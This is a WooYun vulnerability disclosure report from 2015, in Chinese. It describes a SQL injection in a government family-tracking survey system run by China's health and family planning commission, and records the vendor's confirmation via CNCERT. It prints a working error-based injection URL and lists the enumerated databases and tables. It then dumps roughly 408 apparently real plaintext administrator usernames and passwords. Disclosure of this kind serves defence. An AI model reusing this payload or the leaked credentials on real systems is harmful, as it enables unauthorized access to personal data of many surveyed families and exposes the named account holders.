漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0159244
漏洞标题:中国家庭发现追踪调查系统sql注入漏洞可能致海量个人隐私信息暴露
相关厂商:中华人民共和国国家卫生和计划生育委员会
漏洞作者: niexinming
提交时间:2015-12-08 13:18
修复时间:2016-01-23 15:16
公开时间:2016-01-23 15:16
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-12-08: 细节已通知厂商并且等待厂商处理中
2015-12-11: 厂商已经确认,细节仅向厂商公开
2015-12-21: 细节向核心白帽子及相关领域专家公开
2015-12-31: 细节向普通白帽子公开
2016-01-10: 细节向实习白帽子公开
2016-01-23: 细节向公众公开
简要描述:
那么多人的用户信息和电话录音
详细说明:
利用连城县的各种用户名泄露,我找到了
**.**.**.**:8080/platform/
利用
很轻易的登陆进去
然后发现注入漏洞:
注入点:
**.**.**.**:8080/capi-admin/data/displayData.action?databaseId=2014_nhfpc_family_children_clear注入点&groupId=basic_info
这样构造就可以了:
**.**.**.**:8080/capi-admin/data/displayData.action?databaseId=2014_nhfpc_family_children_clear where 1=1 and extractvalue(1, concat(0x5c,(select count(*) from 2014_nhfpc_database_column_group_clear)))&groupId=basic_info
漏洞证明:
[*] dc_syyy
[*] information_schema
[*] mysql
[*] nhfpc_wellsurvey
[*] performance_schema
[*] test
[*] upbos_v2
[*] wellsurvey
nhfpc_wellsurvey的表:
[67 tables]
+----------------------------------------+
| 2014_nhfpc_collateral_person_clear |
| 2014_nhfpc_community_clear |
| 2014_nhfpc_database_column_group_clear |
| 2014_nhfpc_direct_person_clear |
| 2014_nhfpc_family_adult_clear |
| 2014_nhfpc_family_aged_clear |
| 2014_nhfpc_family_children_clear |
| 2014_nhfpc_family_clear |
| 2014_nhfpc_family_younger_clear |
| 2014_nhfpc_sub_family_clear |
| 2014_nhfpc_village_clear |
| nhfpc_data_extract |
| nhfpc_draftsman |
| nhfpc_family_2014_response |
| nhfpc_family_adult_2014_response |
| nhfpc_family_aged_2014_response |
| nhfpc_family_children_2014_response |
| nhfpc_family_contact_status |
| nhfpc_family_status_modify_log |
| nhfpc_family_younger_2014_response |
| nhfpc_personal_info |
| nhfpc_personal_info_back |
| nhfpc_sample_point |
| nhfpc_sample_point_draw_audit |
| nhfpc_sample_point_family |
| nhfpc_sample_point_grid |
| nhfpc_sample_point_resource |
| ws_config |
| ws_customer |
| ws_dictionary |
| ws_error |
| ws_interviewer |
| ws_interviewer_track |
| ws_notice |
| ws_notice_interviewer |
| ws_panel |
| ws_panel_sample_property |
| ws_panel_sample_property_dictionary |
| ws_questionnaire |
| ws_questionnaire_resource |
| ws_questionnaire_tag |
| ws_response |
| ws_response_audio |
| ws_response_audit_log |
| ws_response_location |
| ws_response_network_parameter |
| ws_response_process_record |
| ws_response_process_record_1 |
| ws_response_process_record_2 |
| ws_response_question |
| ws_response_question_audio |
| ws_response_quota |
| ws_response_video_picture |
| ws_right |
| ws_role |
| ws_role_right |
| ws_sample |
| ws_sample_property |
| ws_sample_prototype |
| ws_sample_send |
| ws_survey |
| ws_survey_interviewer |
| ws_survey_quota |
| ws_survey_user |
| ws_user |
| ws_user_interviewer |
| ws_user_role |
+----------------------------------------+
管理员的表
Table: ws_user
[408 entries]
+------------+---------------+
| username | password |
+------------+---------------+
| 230800 | 123456 |
| admin16 | jtgly16 |
| admin04 | zgrkfazx1234 |
| 460000 | 123456 |
| 310500 | 64134384 |
| 120000 | 123456 |
| 531000 | 2202382 |
| byq | byq5566 |
| 210000 | 123456 |
| 510700 | 123456 |
| 450500 | 123456 |
| 140000 | 123456 |
| 310800 | 123456 |
| 110900 | 69745141 |
| 450600 | aa450881 |
| admin11 | jtgly11 |
| 210700 | 123456 |
| admin18 | jtgly18 |
| 210900 | 123456 |
| 620200 | 123456 |
| 510900 | 123456 |
| 420100 | 123456 |
| 331000 | hellojsj |
| 360200 | 123456 |
| 430600 | 123456 |
| mtx | mtx5566 |
| zymz | zymz5566 |
| admin22 | jtgly22 |
| 640200 | 123456 |
| admin | 52monetware |
| 130400 | 123456 |
| 510500 | 123456 |
| 460100 | 123456 |
| 210500 | 123456 |
| 441500 | 123456 |
| admin20 | jtgly20 |
| 361200 | 123456 |
| 210400 | 123456 |
| 610500 | 123456 |
| pax | pax5566 |
| 211300 | 123456 |
| 440400 | 123456 |
| 500000 | 123456 |
| admin8 | jtgly08 |
| 411300 | 123456 |
| 420600 | 123456 |
| admin13 | jtgly13 |
| 510000 | 123456 |
| 230600 | 123456 |
| 320400 | 123456 |
| 131300 | 123456 |
| 341100 | 123456 |
| admin06 | zgrkfazx1234 |
| 361000 | 123456 |
| 330600 | 123456 |
| 210800 | 123456 |
| 120300 | 123456 |
| 150500 | 123456 |
| 320200 | 123456 |
| admin02 | zgrkfazx1234 |
| admin39 | jtgly39 |
| 150000 | 123456 |
| 350000 | 123456 |
| 350500 | 123456 |
| 510600 | 123456 |
| 500100 | 123456 |
| 341600 | 7821951 |
| 341700 | 888888 |
| 450900 | 123456 |
| 230400 | 123456 |
| 540100 | 123456 |
| 360700 | 123456 |
| 370100 | 82078769 |
| 340700 | 123456 |
| 460500 | 123456 |
| 440800 | 123456 |
| 450800 | 123456 |
| 340600 | jt8610269 |
| 000001 | 1234 |
| 610300 | 123456 |
| 220300 | 123456 |
| 140400 | 123456 |
| 620000 | 123456 |
| admin27 | jtgly27 |
| admin14 | jtgly14 |
| 440000 | 123456 |
| 430900 | 123456 |
| 500200 | 123456 |
| 411900 | 123456 |
| 320100 | 123456 |
| 430100 | 123456 |
| admin3 | jtgly03 |
| 110800 | 123456 |
| 441200 | 123456 |
| 341500 | 669130 |
| 220400 | 123456 |
| 330800 | 123456 |
| 230500 | 123456 |
| 530400 | tjg2122764 |
| 210200 | 123456 |
| 350100 | 123456 |
| 371400 | 123456 |
| 441700 | 123456 |
| 150600 | 123456 |
| 350800 | 123456 |
| 330300 | 123456 |
| 511000 | 123456 |
| 370700 | 370682 |
| 650400 | 123456 |
| 410000 | 123456 |
| 110000 | jsw8573 |
| 340200 | nl6821714 |
| 511200 | 123456 |
| 131100 | 123456 |
| 321000 | 123456 |
| 441800 | 123456 |
| 320800 | 123456 |
| 451000 | 123456 |
| 440500 | 123456 |
| 460900 | 123456 |
| admin9 | 201409 |
| 530800 | js590531 |
| admin01 | zgrkfazx1234 |
| 431000 | 123456 |
| 372000 | 123456 |
| 220500 | 123456 |
| 350200 | 111111 |
| 130200 | 4318101 |
| 650300 | 123456 |
| 420900 | 123456 |
| 110700 | 123456 |
| 620500 | 123456 |
| 440700 | 123456 |
| 430300 | 123456 |
| 341400 | 123456 |
| admin23 | jtgly23 |
| admin34 | jtgly34 |
| 441600 | 123456 |
| admin19 | jtgly19 |
| 610800 | 123456 |
| 320300 | 123456 |
| 650100 | 123456 |
| 510400 | 123456 |
| djx | djx5566 |
| 610200 | 306306 |
| 420400 | jtfz2015 |
| admin24 | jtgly24 |
| 310200 | 123456 |
| 210600 | 123456 |
| 441000 | 123456 |
| guzhou | gz555666 |
| 370500 | 123456 |
| 420800 | 123456 |
| 320600 | 123456 |
| admin05 | zgrkfazx1234 |
| 330900 | 123456 |
| 311100 | 123456 |
| 340000 | 123456 |
| 370800 | 123456 |
| 211200 | 123456 |
| xsx | xsx5566 |
| 411400 | 666666 |
| 140200 | 123456 |
| kyx | kyx5566 |
| 370600 | 123456 |
| 211400 | 123456 |
| 610000 | 123456 |
| 440200 | 123456 |
| 220200 | 123456 |
| admin26 | jtgly26 |
| 430700 | xgl7523 |
| admin08 | zgrkfazx1234 |
| admin40 | jtgly40 |
| 360400 | 123456 |
| 341300 | 8626801 |
| scx | scx5566 |
| 371900 | 123456 |
| admin15 | jtgly15 |
| 140600 | 123456 |
| 460300 | HN201411 |
| 370200 | 3263732 |
| 620300 | 123456 |
| 220100 | 123456 |
| 441100 | 123456 |
| 630300 | 123456 |
| 340800 | 6616861 |
| 310700 | 123456 |
| 000000 | 1234 |
| admin03 | zgrkfazx1234 |
| 450200 | 123456 |
| 360300 | 123456 |
| 530700 | 123456 |
| dfx | dfx5566 |
| 371000 | 123456 |
| 330700 | 654321 |
| 650500 | 123456 |
| 140100 | 123456 |
| 341900 | 123456 |
| admin4 | jtgly04 |
| 411600 | 123456 |
| 321100 | 898001016 |
| 360900 | 123456 |
| 630200 | 123456 |
| 450700 | 123456 |
| 320700 | clin2478 |
| 530600 | 123456 |
| 360500 | 123456 |
| 330500 | 123456 |
| 620100 | 765432 |
| 500500 | 123456 |
| 510800 | 123456 |
| 110500 | 123456 |
| 420700 | 123456 |
| admin29 | jtgly29 |
| 450100 | 123456 |
| 412000 | 123456 |
| 640000 | 123456 |
| admin7 | jtgly07 |
| 230300 | 123456 |
| 511400 | 123456 |
| 340300 | hsq8881655myx |
| 410700 | 123456 |
| 230700 | 123456 |
| hpx | hpx5566 |
| 110200 | 123456 |
| 311200 | 123456 |
| 371100 | 123456 |
| 130100 | 123456 |
| 650200 | 123456 |
| admin31 | jtgly31 |
| 430200 | 123456 |
| 430400 | 070419 |
| 140800 | 123456 |
| 341800 | 990166 |
| 370000 | 123456 |
| 130300 | 123456 |
| 371500 | 123456 |
| 330400 | 123456 |
| admin37 | jtgly37 |
| 411700 | 123456 |
| 361100 | 123456 |
| 442000 | 5591093 |
| 360600 | 123456 |
| 420300 | 123456 |
| 340400 | 285366200 |
| 370400 | 123456 |
| admin25 | jtgly25 |
| 220600 | 123456 |
| 350300 | 123456 |
| renfa | 123456 |
| 440100 | 123456 |
| 650000 | 123456 |
| 140700 | 123456 |
| 511500 | 123456 |
| 410200 | 123456 |
| 131000 | 123456 |
| 150400 | 123456 |
| admin38 | jtgly38 |
| 410100 | 123456 |
| 430500 | 123456 |
| 230000 | 123456 |
| 211500 | 123456 |
| 450000 | 123456 |
| 430000 | 123456 |
| 360000 | 123456 |
| 130700 | 123456 |
| 640100 | 123456 |
| 411100 | 201410 |
| 420500 | 123456 |
| 440300 | 123456 |
| 410900 | 123456 |
| 410500 | 123456 |
| 410600 | 123456 |
| 450400 | 123456 |
| 420200 | 123456 |
| 211000 | 123456 |
| 371300 | 123456 |
| 510300 | 123456 |
| 120600 | 69562357 |
| 220000 | 123456 |
| admin6 | jtgly06 |
| 130600 | 123456 |
| 610400 | 123456 |
| 630100 | 123456 |
| 530900 | f123456 |
| wax | wax5566 |
| 370900 | 790303 |
| 321500 | 123456 |
| admin5 | jtgly05 |
| 341200 | 123456 |
| admin07 | zgrkfazx1234 |
| admin28 | jtgly28 |
| 140500 | 123456 |
| 441900 | 123456 |
| 530000 | 123456 |
| 371700 | 123456 |
| 461000 | 123456 |
| 350600 | 123456 |
| 411800 | 123456 |
| 321300 | 123456 |
| 131200 | 123456 |
| 530200 | 123456 |
| 131400 | 123456 |
| 440600 | 123456 |
| 410300 | 123456 |
| 330000 | 123456 |
| 530300 | 123456 |
| 320500 | 123456 |
| 460800 | 123456 |
| 420000 | 123456 |
| 441400 | 123456 |
| 210100 | 123456 |
| admin2 | jtgly02 |
| 460200 | 123456 |
| 340500 | 123456 |
| admin1 | jtgly01 |
| 110600 | 123456 |
| 410800 | 123456 |
| 131500 | 123456 |
| 530500 | 19701215 |
| 120400 | 123456 |
| admin17 | jtgly17 |
| 330200 | 123456 |
| 410400 | 123456 |
| 371200 | 123456 |
| 231000 | 123456 |
| 340100 | 65121054 |
| 460600 | 68613269 |
| admin35 | jtgly35 |
| 500400 | 123456 |
| 150300 | 123456 |
| 530100 | 123456 |
| 211100 | 123456 |
| 370300 | 123456 |
| 421000 | 123456 |
| 640300 | 123456 |
| 110100 | 123456 |
| 610600 | 123456 |
| admin09 | zgrkfazx1234 |
| 510100 | 123456 |
| 321400 | 123456 |
| 360100 | 123456 |
| admin30 | jtgly30 |
| 230100 | 123456 |
| 461100 | 67812907 |
| 320900 | rg201417 |
| 340900 | 123456 |
| admin36 | jtgly36 |
| 320000 | qwe123 |
| 430800 | 123456 |
| 210300 | 123456 |
| 130000 | 123456 |
| qxgq | qxgq5566 |
| 440900 | 123456 |
| 500600 | 123456 |
| 321200 | 123456 |
| 130800 | 123123 |
| 350700 | 123456 |
| 411000 | 123456 |
| 341000 | 18905668070 |
| 230900 | 123456 |
| 411500 | 667958 |
| 450300 | 123456 |
| 460700 | 123456 |
| 110400 | 123456 |
| 130900 | 123456 |
| admin21 | jtgly21 |
| admin10 | zgrkfazx1234 |
| 360800 | py123456 |
| 310900 | 123456 |
| 230200 | 123456 |
| 110300 | 123456 |
| 620400 | 123456 |
| 150100 | 123456 |
| 610700 | 123456 |
| 310100 | 123456 |
| 500300 | 123456 |
| 111000 | 123456 |
| 120100 | 123456 |
| 310400 | 123456 |
| 511100 | 123456 |
| 150200 | 123456 |
| 342000 | 8080007 |
| 460400 | 123456 |
| 461200 | 123456 |
| 610100 | 85350269 |
| 411200 | 123456 |
| 371600 | 6239150 |
| 540000 | 123456 |
| 120200 | 123456 |
| 630000 | 123456 |
| admin12 | jtgly12 |
| 120500 | 196461 |
| 371800 | 123456 |
| 441300 | 123456 |
| admin33 | jtgly33 |
| 140300 | 123456 |
| 350400 | 123456 |
| 130500 | 123456 |
| 511300 | 123456 |
| 510200 | 123456 |
| 310300 | 123456 |
| admin32 | jtgly32 |
| 330100 | 123456 |
| 310000 | 123456 |
| liyue | 112233445566 |
| luoxiaoqin | 123456 |
| zhaoyimeng | 910321 |
+------------+---------------+
修复方案:
过滤,不要把管理员密码明文存储
版权声明:转载请注明来源 niexinming@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2015-12-11 16:09
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT向国家上级信息安全协调机构上报,由其后续协调网站管理单位处置.
最新状态:
暂无